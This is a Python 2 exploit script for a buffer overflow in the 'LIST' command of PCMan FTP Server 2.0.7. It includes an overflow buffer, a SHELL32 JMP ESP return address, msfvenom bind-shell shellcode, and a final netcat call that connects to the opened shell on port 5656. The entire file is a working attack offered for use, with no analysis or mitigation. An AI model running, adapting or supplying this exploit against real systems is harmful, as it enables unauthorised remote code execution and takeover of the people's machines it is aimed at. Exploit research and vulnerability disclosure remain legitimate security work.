#!/usr/bin/env python
#-*- coding: utf-8 -*-
 
# Exploit Title: PCMan FTP Server 2.0.7 - 'LIST' Command Buffer Overflow 
# Date: 07/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Tested on: Windows 7 Ultimate 32Bit
 
import socket
import sys
import os
import time

def exploit(target, port):

    eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3   JMP ESP

    # msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c
    shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1"
        "\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f"
        "\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53"
        "\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16"
        "\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3"
        "\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d"
        "\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae"
        "\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29"
        "\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5"
        "\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43"
        "\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc"
        "\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4"
        "\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12"
        "\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49"
        "\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc"
        "\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2"
        "\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24"
        "\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59"
        "\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81"
        "\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5"
        "\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb"
        "\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5"
        "\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5"
        "\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93")

    buffer = 'A'*2006 + eip + "\x90"*21 + shellcode

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,port))
        s.recv(1024)
        print "[+] Connect to %s on port %d" % (target,port)
    except Exception, e:
        print "[-] Could not create socket", e.message
        sys.exit(0)

    try:    
        s.send('USER anonymous\r\n')
        s.recv(1024)
        s.send('PASS CT-Zer0\r\n')
        s.recv(1024)
        s.send('LIST ' + buffer + '\r\n')
        print "[+] Exploit Sent Successfully"
        s.close()
        print '[+] You got bind shell on port 5656\n'
        time.sleep(2)
        os.system('nc ' + target + ' 5656')
    except:
        print "[-] Could not connect to target"

def banner():
    banner = "\n\n"
    banner +="  aaaaaaaaaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaa  aaaaaaa     \n"
    banner +=" aaaaaaaaaaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa    \n"
    banner +=" aaa        aaaaaaaaa aaaaa aaaaaa  aaaaaaaaaaaaaaaaa    \n"
    banner +=" aaa        aaaaaaaaaaaaaa  aaaaaa  aaaaaaaaaaaaaaaaa    \n"
    banner +=" aaaaaaaa   aaa     aaaaaaaaaaaaaaaaaaa  aaaaaaaaaaaa    \n"
    banner +="  aaaaaaa   aaa     aaaaaaaaaaaaaaaaaaa  aaa aaaaaaa     \n"
    banner +="                                          \n"                                                
    print banner

if len(sys.argv) == 3:
    banner()
    target = sys.argv[1]
    port = int(sys.argv[2])
    exploit(target, port)
else:
    banner()
    print "[*] Usage: python %s <IP> <Port>\n" % sys.argv[0]
    sys.exit(0)